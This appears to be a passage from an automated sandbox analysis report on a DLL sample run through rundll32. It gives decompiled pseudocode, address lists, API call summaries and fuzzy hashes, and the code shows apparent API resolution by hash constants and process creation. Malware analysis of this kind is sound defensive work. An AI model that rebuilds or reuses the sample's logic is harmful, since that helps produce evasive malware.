                  				 *(_t122 + 0x60) = r13d;
                  				E0000000118000459C(0xbe782669, _t88,  *((intOrPtr*)( *__rcx + 0x50)));
                  				if (_t88 == _t133) goto 0x80005eea;
                  				_t19 = _t122 + 0x68; // 0xa
                  				r9d = 0;
                  				r8d = 0;
                  				 *((long long*)(_t122 + 0x28)) = _t19;
                  				 *((long long*)(_t122 + 0x20)) = _t122 + 0x60;
                  				 *_t88();
                  				r8d =  *(_t122 + 0x60);
                  				HeapAlloc(_t133, _t130, _t111);
                  				if (_t88 == _t133) goto 0x80005fad;
                  				E0000000118000459C(0xbe782669, _t88,  *((intOrPtr*)( *__rcx + 0x50)));
                  				if (_t88 == _t133) goto 0x80005f43;
                  				_t27 = _t122 + 0x68; // 0xa
                  				r8d = 0;
                  				 *((long long*)(_t122 + 0x28)) = _t27;
                  				 *((long long*)(_t122 + 0x20)) = _t122 + 0x60;
                  				 *_t88();
                  				goto 0x80005f46;
                  				if (r13d == r13d) goto 0x80005f95;
                  				 *(_t122 + 0x60) =  *(_t122 + 0x60) >> 1;
                  				 *((intOrPtr*)(_t88 + _t88 * 2)) = r13w;
                  				r8d =  *(_t122 + 0x60);
                  				HeapAlloc(_t114, _t117);
                  				if (_t88 == _t133) goto 0x80005f8e;
                  				r8d =  *(_t122 + 0x60);
                  				r8d = r8d + 1;
                  				wcstombs(??, ??, ??);
                  				 *(__rcx + 0x20) = _t88;
                  				goto 0x80005f9d;
                  				goto 0x80005f9d;
                  				GetLastError();
                  				HeapFree(??, ??, ??);
                  				goto 0x80005fbc;
                  				goto 0x80005fbc;
                  				return GetLastError();
                  			}











                  0x180005df8
                  0x180005e04
                  0x180005e08
                  0x180005e19
                  0x180005e1f
                  0x180005e23
                  0x180005e2b
                  0x180005e31
                  0x180005e42
                  0x180005e4a
                  0x180005e52
                  0x180005e54
                  0x180005e5c
                  0x180005e6b
                  0x180005e73
                  0x180005e75
                  0x180005e7e
                  0x180005e81
                  0x180005e90
                  0x180005e99
                  0x180005e9b
                  0x180005ea3
                  0x180005ea9
                  0x180005eae
                  0x180005ebc
                  0x180005ec4
                  0x180005ec6
                  0x180005ecb
                  0x180005ece
                  0x180005ed1
                  0x180005edf
                  0x180005ee8
                  0x180005eea
                  0x180005ef8
                  0x180005f04
                  0x180005f13
                  0x180005f1b
                  0x180005f1d
                  0x180005f22
                  0x180005f28
                  0x180005f36
                  0x180005f3f
                  0x180005f41
                  0x180005f49
                  0x180005f56
                  0x180005f5a
                  0x180005f5f
                  0x180005f67
                  0x180005f73
                  0x180005f75
                  0x180005f80
                  0x180005f83
                  0x180005f88
                  0x180005f8c
                  0x180005f93
                  0x180005f95
                  0x180005fa5
                  0x180005fab
                  0x180005fb2
                  0x180005fce

                  APIs
                  Memory Dump Source
                  • Source File: 00000004.00000002.764516562.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000004.00000002.764474142.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.764560940.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.764577670.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: Heap$Alloc$ErrorFreeLastwcstombs
                  • String ID:
                  • API String ID: 4133724704-0
                  • Opcode ID: 153f03945acc7980eafc6a68c3935249d809b24ea8f0d96ec6fa36ed55d54185
                  • Instruction ID: a4f29d9b70dc603b3f8cc85abbd9ea91cf1cef2a8837b32e5229c32126143bc8
                  • Opcode Fuzzy Hash: 153f03945acc7980eafc6a68c3935249d809b24ea8f0d96ec6fa36ed55d54185
                  • Instruction Fuzzy Hash: 3F515A36204A8887E7A1DB52E4403AF7761F78C7C9F548521BA8D87B54DF38D65D8B00
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 18%
                  			E00000001180003FCC(intOrPtr* __rcx) {
                  				void* __rbx;
                  				void* __rbp;
                  				long long* _t84;
                  				long long* _t85;
                  				void* _t87;
                  				intOrPtr* _t106;
                  				void* _t109;
                  
                  				_t84 =  *0x8000d4a0;
                  				_t106 = __rcx;
                  				 *(_t109 + 0x58) =  *(_t109 + 0x58) & 0;
                  				E0000000118000459C(0x3a7e805d, _t84,  *((intOrPtr*)( *__rcx + 0x50)));
                  				if (_t84 == 0) goto 0x8000400e;
                  				 *_t84();
                  				goto 0x80004010;
                  				if (0 == 0) goto 0x80004151;
                  				if ( *((intOrPtr*)(_t109 + 0x50)) == 0) goto 0x8000414c;
                  				 *0x8000d028();
                  				if (0 != 0) goto 0x80004145;
                  				r8d = 0x1000;
                  				HeapAlloc(??, ??, ??);
                  				if (_t84 == 0) goto 0x80004133;
                  				E0000000118000459C(0x3cd8e449, _t84,  *((intOrPtr*)( *__rcx + 0x50)));
                  				if (_t84 == 0) goto 0x8000408d;
                  				r8d = 0x1000;
                  				r8d =  <  ?  *((void*)(_t109 + 0x50)) : r8d;
                  				 *_t84();
                  				goto 0x8000408f;
                  				if (0 == 0) goto 0x800040b7;
                  				r8d =  *(_t109 + 0x58);
                  				r9d = 0;
                  				_t85 =  *((intOrPtr*)( *((intOrPtr*)(_t109 + 0x60))));
                  				 *((intOrPtr*)(_t85 + 0x20))();
                  				r11d =  *(_t109 + 0x58);
                  				 *((intOrPtr*)(_t109 + 0x50)) =  *((intOrPtr*)(_t109 + 0x50)) - r11d;
                  				if (0 == 0) goto 0x800040bf;
                  				goto 0x80004059;
                  				GetLastError();
                  				if (WaitForSingleObject(??, ??) == 0) goto 0x8000410b;
                  				E0000000118000459C(0x3a7e805d, _t85,  *((intOrPtr*)( *__rcx + 0x50)));
                  				if (_t85 == 0) goto 0x800040ef;
                  				 *_t85();
                  				goto 0x800040f1;
                  				if (0 == 0) goto 0x80004101;
                  				if ( *((intOrPtr*)(_t109 + 0x50)) == 0) goto 0x80004110;
                  				goto 0x80004059;
                  				GetLastError();
                  				goto 0x80004110;
                  				HeapFree(??, ??, ??);
                  				if (0x102 != 0) goto 0x80004138;
                  				E000000011800085E4(_t87, __rcx,  *((intOrPtr*)(_t109 + 0x60)));
                  				goto 0x80004138;
                  				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t109 + 0x60)))) + 0x10))();
                  				goto 0x80004166;
                  				goto 0x80004166;
                  				 *(_t106 + 0x60) =  *(_t106 + 0x60) & 0x00000008;
                  				goto 0x80004166;
                  				if (GetLastError() != 0x2efe) goto 0x80004166;
                  				 *(_t106 + 0x60) =  *(_t106 + 0x60) & 0x00000000;
                  				return 0;
                  			}










                  0x180003fda
                  0x180003fe1
                  0x180003fef
                  0x180003ff7
                  0x180003fff
                  0x18000400a
                  0x18000400c
                  0x180004012
                  0x18000401c
                  0x18000402e
                  0x180004036
                  0x18000403e
                  0x180004047
                  0x180004053
                  0x180004062
                  0x18000406a
                  0x180004070
                  0x180004083
                  0x180004089
                  0x18000408b
                  0x180004091
                  0x180004098
                  0x18000409d
                  0x1800040a0
                  0x1800040a6
                  0x1800040a9
                  0x1800040ae
                  0x1800040b3
                  0x1800040b5
                  0x1800040b7
                  0x1800040cd
                  0x1800040d8
                  0x1800040e0
                  0x1800040eb
                  0x1800040ed
                  0x1800040f3
                  0x1800040fa
                  0x1800040fc
                  0x180004101
                  0x180004109
                  0x180004118
                  0x180004120
                  0x18000412a
                  0x180004131
                  0x180004140
                  0x180004143
                  0x18000414a
                  0x18000414c
                  0x18000414f
                  0x18000415e
                  0x180004160
                  0x180004172

                  APIs
                  Memory Dump Source
                  • Source File: 00000004.00000002.764516562.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000004.00000002.764474142.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.764560940.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.764577670.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: ErrorLast$Heap$AllocFreeObjectSingleWait
                  • String ID:
                  • API String ID: 2540544816-0
                  • Opcode ID: 2125c37f1b6f3d76281b7aab6874424e369f3f46deb369ce77790706a182fef6
                  • Instruction ID: f07a79ff2e09cda6f9955aa739d580884efaaa7540e40516afedcf37a36379f0
                  • Opcode Fuzzy Hash: 2125c37f1b6f3d76281b7aab6874424e369f3f46deb369ce77790706a182fef6
                  • Instruction Fuzzy Hash: B54143B330464986EB92DB66D8403EA73A1F78CBD1F048425BE498BB95DF78C68DC714
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 45%
                  			E000000011800091F8(void* __ecx, long long __rbx, signed long long __rcx, signed long long __rdx, long long __rsi, void* __rbp, void* __r9, signed long long* _a8, void* _a16, void* _a24) {
                  				void* _t46;
                  				long _t52;
                  				void* _t54;
                  				signed long long _t67;
                  				long long _t69;
                  				signed long long* _t73;
                  				signed long long _t80;
                  				signed long long _t87;
                  				intOrPtr _t90;
                  				struct _FILETIME* _t91;
                  				void* _t98;
                  				void* _t103;
                  				signed long long _t104;
                  				signed long long* _t105;
                  
                  				_t103 = _t98;
                  				 *((long long*)(_t103 + 0x10)) = __rbx;
                  				 *((long long*)(_t103 + 0x18)) = __rsi;
                  				 *(_t103 + 8) =  *(_t103 + 8) & 0x00000000;
                  				 *((long long*)(_t103 - 0x18)) = _t103 + 8;
                  				_t46 =  *((intOrPtr*)(__rcx + 0xa0))();
                  				_t73 = _a8;
                  				if (_t73 == 0) goto 0x8000925e;
                  				_t87 = _t73 + 0x18;
                  				 *(_t73 + 0x20) = _t87;
                  				_a8[3] = _t87;
                  				_a8[2] = __rcx;
                  				_a8[1] = __rdx;
                  				 *_a8 =  *_a8 | 0xffffffff;
                  				if (_t46 != 0) goto 0x80009327;
                  				GetSystemTimeAsFileTime(_t91);
                  				EnterCriticalSection(??);
                  				_t104 = __rcx + 0x88;
                  				_t80 =  *(_t104 + 8);
                  				_a8[3] = _t104;
                  				_a8[4] = _t80;
                  				 *_t80 =  &(_a8[3]);
                  				_t67 =  &(_a8[3]);
                  				 *(_t104 + 8) = _t67;
                  				LeaveCriticalSection(??);
                  				asm("lock add dword [edi+0x40], 0x1");
                  				E00000001180006C8C(__ecx, _t67, __rbx, 0x180004c4c, _a8, __rdx, __rbp,  &(_a8[7]));
                  				_a8[6] = _t67;
                  				if (_a8[6] != 0) goto 0x80009331;
                  				_t52 = GetLastError();
                  				EnterCriticalSection(??);
                  				_t105 = _a8;
                  				_t69 =  *((intOrPtr*)(_t105 + 0x20));
                  				_t90 =  *((intOrPtr*)(_t105 + 0x18));
                  				 *_t69 = _t90;
                  				 *((long long*)(_t90 + 8)) = _t69;
                  				LeaveCriticalSection(??);
                  				asm("lock add dword [edi+0x40], 0xffffffff");
                  				if (_t52 == 0) goto 0x80009331;
                  				if (_a8 == 0) goto 0x80009331;
                  				E00000001180002770(_t54, _a8);
                  				return _t52;
                  			}

















                  0x1800091f8
                  0x1800091fb
                  0x1800091ff
                  0x180009208
                  0x180009214
                  0x18000921b
                  0x180009221
                  0x18000922b
                  0x18000922d
                  0x180009231
                  0x18000923a
                  0x180009243
                  0x18000924c
                  0x180009255
                  0x180009260
                  0x18000926a
                  0x180009274
                  0x18000927f
                  0x180009286
                  0x18000928a
                  0x180009293
                  0x1800092a0
                  0x1800092ac
                  0x1800092b0
                  0x1800092b4
                  0x1800092ba
                  0x1800092cf
                  0x1800092d9
                  0x1800092e7
                  0x1800092f3
                  0x1800092f5
                  0x1800092fb
                  0x180009300
                  0x180009304
                  0x18000930c
                  0x18000930f
                  0x180009313
                  0x180009319
                  0x180009320
                  0x18000932a
                  0x18000932c
                  0x180009342

                  APIs
                  Memory Dump Source
                  • Source File: 00000004.00000002.764516562.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000004.00000002.764474142.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.764560940.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.764577670.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: CriticalSection$EnterLeaveTime$ErrorFileLastSystem
                  • String ID:
                  • API String ID: 3478816279-0
                  • Opcode ID: 8f23624cea707e58dae8fde3f8c92bf3611580a11c447dc04c2f461c6a941a79
                  • Instruction ID: bca48ed322468cd715f0c7fdd995b284444db085db22600a9e38dd0ce7ab83a9
                  • Opcode Fuzzy Hash: 8f23624cea707e58dae8fde3f8c92bf3611580a11c447dc04c2f461c6a941a79
                  • Instruction Fuzzy Hash: 18415676204F4992DB44CF55E48439D73B4F789B94F608221EBAD837A4DF3ACA6AC740
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • WideCharToMultiByte.KERNEL32(?,?,?,?,00000000,00000000,?,0000000180003748,?,?,?,?,00000000,00000000,00000000,0000000180001A09), ref: 0000000180005A5E
                  • HeapAlloc.KERNEL32(?,?,?,?,00000000,00000000,?,0000000180003748,?,?,?,?,00000000,00000000,00000000,0000000180001A09), ref: 0000000180005A72
                  • WideCharToMultiByte.KERNEL32(?,?,?,?,00000000,00000000,?,0000000180003748,?,?,?,?,00000000,00000000,00000000,0000000180001A09), ref: 0000000180005AA0
                  • GetLastError.KERNEL32(?,?,?,?,00000000,00000000,?,0000000180003748,?,?,?,?,00000000,00000000,00000000,0000000180001A09), ref: 0000000180005AB4
                  • HeapFree.KERNEL32(?,?,?,?,00000000,00000000,?,0000000180003748,?,?,?,?,00000000,00000000,00000000,0000000180001A09), ref: 0000000180005AC4
                  • GetLastError.KERNEL32(?,?,?,?,00000000,00000000,?,0000000180003748,?,?,?,?,00000000,00000000,00000000,0000000180001A09), ref: 0000000180005AD3
                  Memory Dump Source
                  • Source File: 00000004.00000002.764516562.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000004.00000002.764474142.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.764560940.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.764577670.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: ByteCharErrorHeapLastMultiWide$AllocFree
                  • String ID:
                  • API String ID: 2267670476-0
                  • Opcode ID: 239e5c35e8e62ae3583b30c7b5811d5668ef9734cbd357c9bf41832aa8aa9b74
                  • Instruction ID: 6c13c8b96c3627637da9d419a19c7af847a2c5e8b3803c2844c54b1b1a61164e
                  • Opcode Fuzzy Hash: 239e5c35e8e62ae3583b30c7b5811d5668ef9734cbd357c9bf41832aa8aa9b74
                  • Instruction Fuzzy Hash: 1B21A132304B4886E391DF63B88879A76A5F74CBD0F69C139EE9A93750DF34C9498701
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 32%
                  			E00000001180009B7C(long long __rbx, void* __rcx, void* __rdx, long long __rdi, long long __rsi, long long __rbp, long long __r8, void* _a8, void* _a16, void* _a24, void* _a32) {
                  				intOrPtr _v40;
                  				long long _v56;
                  				void* _t32;
                  				intOrPtr _t33;
                  				void* _t55;
                  				WCHAR* _t63;
                  				WCHAR* _t66;
                  				CHAR* _t69;
                  
                  				_t32 = _t55;
                  				 *((long long*)(_t32 + 8)) = __rbx;
                  				 *((long long*)(_t32 + 0x10)) = __rbp;
                  				 *((long long*)(_t32 + 0x18)) = __rsi;
                  				 *((long long*)(_t32 + 0x20)) = __rdi;
                  				_t33 =  *0x8000d4a0;
                  				lstrlenA(_t69);
                  				lstrlenW(_t66);
                  				lstrlenW(_t63);
                  				r8d = __rbx + _t33 + 0x12;
                  				HeapAlloc(??, ??, ??);
                  				if (_t33 == 0) goto 0x80009c2e;
                  				_v56 = __r8;
                  				__imp__wnsprintfW();
                  				r9d = 0;
                  				r8d = 0;
                  				E00000001180006754(__rbx, __rcx, _t33, __r8, __rdx,  *0x8000d490 + 0x80011438);
                  				HeapFree(??, ??, ??);
                  				goto 0x80009c32;
                  				return _v40;
                  			}











                  0x180009b7c
                  0x180009b7f
                  0x180009b83
                  0x180009b87
                  0x180009b8b
                  0x180009b99
                  0x180009bb6
                  0x180009bbf
                  0x180009bca
                  0x180009bd9
                  0x180009bdf
                  0x180009beb
                  0x180009c00
                  0x180009c05
                  0x180009c0b
                  0x180009c0e
                  0x180009c17
                  0x180009c26
                  0x180009c2c
                  0x180009c52

                  APIs
                  • lstrlenA.KERNEL32(?,?,?,?,?,00000000,00000000,00000001800019DC), ref: 0000000180009BB6
                  • lstrlenW.KERNEL32(?,?,?,?,?,00000000,00000000,00000001800019DC), ref: 0000000180009BBF
                  • lstrlenW.KERNEL32(?,?,?,?,?,00000000,00000000,00000001800019DC), ref: 0000000180009BCA
                  • HeapAlloc.KERNEL32(?,?,?,?,?,00000000,00000000,00000001800019DC), ref: 0000000180009BDF
                  • wnsprintfW.SHLWAPI ref: 0000000180009C05
                    • Part of subcall function 0000000180006754: memset.NTDLL ref: 0000000180006786
                    • Part of subcall function 0000000180006754: CreateProcessW.KERNELBASE ref: 00000001800067F7
                    • Part of subcall function 0000000180006754: WaitForMultipleObjects.KERNEL32 ref: 0000000180006824
                    • Part of subcall function 0000000180006754: TerminateProcess.KERNEL32 ref: 0000000180006844
                    • Part of subcall function 0000000180006754: CloseHandle.KERNEL32 ref: 000000018000684F
                    • Part of subcall function 0000000180006754: CloseHandle.KERNEL32 ref: 000000018000685A
                    • Part of subcall function 0000000180006754: HeapFree.KERNEL32 ref: 0000000180006877
                  • HeapFree.KERNEL32(?,?,?,?,?,00000000,00000000,00000001800019DC), ref: 0000000180009C26
                  Memory Dump Source
                  • Source File: 00000004.00000002.764516562.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000004.00000002.764474142.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.764560940.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.764577670.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: Heaplstrlen$CloseFreeHandleProcess$AllocCreateMultipleObjectsTerminateWaitmemsetwnsprintf
                  • String ID:
                  • API String ID: 3150570956-0
                  • Opcode ID: 6cd4a2c8511e4e4c6e1545c7a0fa09ed279638593f974f86d33c3e35563dcb8d
                  • Instruction ID: c1893427c912dd33d9beb41109e2d516a90994c651c2d5da5d8851701b433d67
                  • Opcode Fuzzy Hash: 6cd4a2c8511e4e4c6e1545c7a0fa09ed279638593f974f86d33c3e35563dcb8d
                  • Instruction Fuzzy Hash: DD217F35710B48C6EB45CF66A85479A77A0F78CFC4F848126EE5A43B64DF38D60ACB00
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 30%
                  			E00000001180004DD0(long long __rbx, void* __rcx, long long* __rdx, long long __rsi, long long* __r8) {
                  				void* _t13;
                  				intOrPtr* _t39;
                  				intOrPtr _t41;
                  				CHAR* _t54;
                  				long long _t60;
                  				long long _t61;
                  				void* _t63;
                  				long _t69;
                  				long _t73;
                  				long long _t74;
                  				void* _t76;
                  				CHAR* _t79;
                  
                  				 *((long long*)(_t63 + 8)) = __rbx;
                  				 *((long long*)(_t63 + 0x10)) = _t60;
                  				 *((long long*)(_t63 + 0x18)) = __rsi;
                  				_t39 =  *0x8000d4a0;
                  				_t41 =  *((intOrPtr*)(_t39 + 8));
                  				_t13 = lstrlenA(_t79) + 1;
                  				r8d = _t13;
                  				HeapAlloc(_t76, _t73, _t69);
                  				_t74 = _t39;
                  				if (_t39 == __rsi) goto 0x80004eb7;
                  				HeapAlloc(??, ??, ??);
                  				_t61 = _t39;
                  				if (_t39 == __rsi) goto 0x80004ea9;
                  				E00000001180004994(_t39, _t41, __rcx);
                  				if (_t39 == __rsi) goto 0x80004e62;
                  				if ( *_t39 !=  *((intOrPtr*)(_t39 + 1))) goto 0x80004e62;
                  				_t6 = _t39 + 2; // 0x2
                  				E00000001180004994(_t39, _t41, _t6);
                  				if (_t39 == __rsi) goto 0x80004e8e;
                  				r8d = _t13 - r12d;
                  				memcpy(??, ??, ??);
                  				 *((intOrPtr*)(_t41 + _t74)) = sil;
                  				lstrcpyA(_t54);
                  				goto 0x80004e9c;
                  				lstrcpyA(??, ??);
                  				 *_t61 = 0x2f;
                  				 *((intOrPtr*)(_t61 + 1)) = sil;
                  				 *__rdx = _t74;
                  				 *__r8 = _t61;
                  				goto 0x80004eb7;
                  				HeapFree(??, ??, ??);
                  				return 1;
                  			}















                  0x180004dd0
                  0x180004dd5
                  0x180004dda
                  0x180004dec
                  0x180004df9
                  0x180004e0d
                  0x180004e0f
                  0x180004e14
                  0x180004e1a
                  0x180004e20
                  0x180004e2e
                  0x180004e34
                  0x180004e3a
                  0x180004e3f
                  0x180004e4a
                  0x180004e51
                  0x180004e53
                  0x180004e5a
                  0x180004e6b
                  0x180004e72
                  0x180004e77
                  0x180004e82
                  0x180004e86
                  0x180004e8c
                  0x180004e8e
                  0x180004e94
                  0x180004e98
                  0x180004e9c
                  0x180004ea4
                  0x180004ea7
                  0x180004eb1
                  0x180004ed5

                  APIs
                  Memory Dump Source
                  • Source File: 00000004.00000002.764516562.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000004.00000002.764474142.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.764560940.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.764577670.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: Heap$Alloclstrcpy$Freelstrlenmemcpystrchr
                  • String ID:
                  • API String ID: 2951650171-0
                  • Opcode ID: 25580c475dfecbdfe4d78f5cd292cb49b4452150f233a642b5b76edbf8c5295f
                  • Instruction ID: 05cbd2bd38c1d1587f62c6617ae6625bb3c46c91ac70328d53f87b1fbcc7e3b3
                  • Opcode Fuzzy Hash: 25580c475dfecbdfe4d78f5cd292cb49b4452150f233a642b5b76edbf8c5295f
                  • Instruction Fuzzy Hash: 9C21BF723047D886E782EF66B80839ABA91B38CFD4F49C420FE498B755DE38C649C700
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 29%
                  			E000000011800099F4(void* __ecx, long long __rbx, void* __rcx, long long __rdx, void* __rsi, void* __rbp, intOrPtr* __r8, void* __r10, void* __r11, char _a8, long long _a16, long long _a24) {
                  				void* _v48;
                  				char _v56;
                  				char _v64;
                  				char _v72;
                  				intOrPtr _v80;
                  				long long _v88;
                  				void* __rdi;
                  				void* _t73;
                  				long long _t75;
                  				void* _t91;
                  				intOrPtr _t106;
                  				intOrPtr* _t115;
                  
                  				_t92 = __rsi;
                  				_a24 = __rbx;
                  				_a16 = __rdx;
                  				_t106 =  *((intOrPtr*)(__rcx + 0x40));
                  				_t75 = __rdx;
                  				r10d =  *(_t106 + 2) & 0x0000ffff;
                  				_t115 = __r8;
                  				if ( *0x8000d4a0 - __r10 + 8 <= 0) goto 0x80009a51;
                  				_t73 = __r10 + _t106 + 8;
                  				if (( *0x8000d498 ^ 0xecb028fc) == 0) goto 0x80009a53;
                  				E00000001180004ED8( *0x8000d498 ^ 0xecb028fc, _t73);
                  				goto 0x80009a53;
                  				if (_t73 == 0) goto 0x80009b5c;
                  				_t9 =  &_a8; // 0x52
                  				_t10 =  &_v56; // 0x12
                  				if (E000000011800094E0(__rdx, _t73, _t91, __rsi, __rbp, _t10, _t9) != 0) goto 0x80009b61;
                  				_t11 = _t73 + 2; // 0x2
                  				if (_a8 - _t11 <= 0) goto 0x80009aa8;
                  				_t15 =  &_v64; // 0xa
                  				_t16 =  &_v48; // 0x1a
                  				E000000011800081F0(_a8, _t75, _v56, _t92, _t16, _t15, __r11);
                  				goto 0x80009aad;
                  				if (0x57 != 0) goto 0x80009b36;
                  				r13d = _v64;
                  				_t19 =  &_v72; // 0x2
                  				_t20 =  &_v64; // 0xa
                  				_v80 = r13d;
                  				_v72 =  *_t115;
                  				_v88 = _v48;
                  				if (E00000001180006EB0( *_t115, _t75, _t75, _t20, _t19) != 0) goto 0x80009b16;
                  				memcpy(??, ??, ??);
                  				 *_t115 = _v72;
                  				HeapFree(??, ??, ??);
                  				goto 0x80009b1b;
                  				memset(??, ??, ??);
                  				HeapFree(??, ??, ??);
                  				r8d = _a8;
                  				memset(??, ??, ??);
                  				HeapFree(??, ??, ??);
                  				goto 0x80009b61;
                  				return 2;
                  			}















                  0x1800099f4
                  0x1800099f4
                  0x1800099f9
                  0x180009a0b
                  0x180009a16
                  0x180009a19
                  0x180009a36
                  0x180009a3c
                  0x180009a3e
                  0x180009a45
                  0x180009a4a
                  0x180009a4f
                  0x180009a56
                  0x180009a5c
                  0x180009a64
                  0x180009a77
                  0x180009a7d
                  0x180009a87
                  0x180009a95
                  0x180009a9a
                  0x180009a9f
                  0x180009aa6
                  0x180009aaf
                  0x180009ab5
                  0x180009ac2
                  0x180009ac7
                  0x180009acf
                  0x180009ad4
                  0x180009ad8
                  0x180009ae6
                  0x180009afc
                  0x180009b0b
                  0x180009b0e
                  0x180009b14
                  0x180009b23
                  0x180009b30
                  0x180009b36
                  0x180009b45
                  0x180009b54
                  0x180009b5a
                  0x180009b78

                  APIs
                  Memory Dump Source
                  • Source File: 00000004.00000002.764516562.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000004.00000002.764474142.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.764560940.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.764577670.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: FreeHeap$memset$memcpy
                  • String ID:
                  • API String ID: 4172471534-0
                  • Opcode ID: 19c3d6e2ffa1d9129ebda51cd38f1831e22d6d71fe2475a4891dd23ee8e2eb9e
                  • Instruction ID: 54b9a56baf89d223affce05d04c9eed0c8a26e8b2822132c81dbcb815bbc5161
                  • Opcode Fuzzy Hash: 19c3d6e2ffa1d9129ebda51cd38f1831e22d6d71fe2475a4891dd23ee8e2eb9e
                  • Instruction Fuzzy Hash: A9418E32204A8982EA92DB56E4007DBB7A1F7CDBD4F55C012FE8947759EF38C64ACB40
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 37%
                  			E00000001180008034(void* __ebx, signed int __edx, void* __ebp, long long __rbx, void* __rcx, long long __rsi, long long __rbp, long long __r8, intOrPtr* __r9, void* _a8, void* _a16, long long* _a24, void* _a32) {
                  				void* _t44;
                  				void* _t52;
                  				long long _t53;
                  				signed long long _t54;
                  				intOrPtr _t67;
                  				long _t68;
                  				long long _t70;
                  				void* _t77;
                  				intOrPtr* _t83;
                  				long _t87;
                  				void* _t88;
                  				void* _t90;
                  				struct _CRITICAL_SECTION* _t92;
                  				struct _CRITICAL_SECTION* _t96;
                  
                  				_t52 = _t77;
                  				 *((long long*)(_t52 + 8)) = __rbx;
                  				 *((long long*)(_t52 + 0x10)) = __rbp;
                  				 *((long long*)(_t52 + 0x20)) = __rsi;
                  				 *((long long*)(_t52 + 0x18)) = __r8;
                  				_t53 =  *0x8000d4a0;
                  				_t88 = __rcx;
                  				EnterCriticalSection(_t96);
                  				LeaveCriticalSection(_t92);
                  				HeapAlloc(_t90, _t87, _t68);
                  				_t70 = _t53;
                  				if (_t53 == __edx) goto 0x80008129;
                  				memset(??, ??, ??);
                  				EnterCriticalSection(??);
                  				r11d =  *((intOrPtr*)(__rcx + 0xa8));
                  				_t44 =  >=  ? r11d :  *((intOrPtr*)(__rcx + 0xa8));
                  				if (_t44 == 0) goto 0x80008111;
                  				_t54 = __edx + __edx * 4;
                  				_t14 = _t88 + 0x98; // 0x98
                  				_t16 = _t54 * 8; // 0xc
                  				_t83 = _t70 + _t16 + 0xc;
                  				_t67 =  *_t14;
                  				 *((intOrPtr*)(_t83 - 0xc)) =  *((intOrPtr*)(_t67 + 0x1c));
                  				 *((long long*)(_t83 + 0x14)) =  *((intOrPtr*)(_t67 + 0x10));
                  				 *_t83 =  *((intOrPtr*)(_t67 + 0x18));
                  				 *((intOrPtr*)(_t83 + 0x28 - 0x1c)) =  *((intOrPtr*)(_t67 + 0x18));
                  				if (_t44 + 0xffffffff != 0) goto 0x800080e7;
                  				LeaveCriticalSection(??);
                  				 *__r9 = __ebp + 1;
                  				 *_a24 = _t70;
                  				goto 0x8000812e;
                  				return 8;
                  			}

















                  0x180008034
                  0x180008037
                  0x18000803b
                  0x18000803f
                  0x180008043
                  0x180008054
                  0x18000805e
                  0x18000806f
                  0x180008082
                  0x18000809a
                  0x1800080a2
                  0x1800080a8
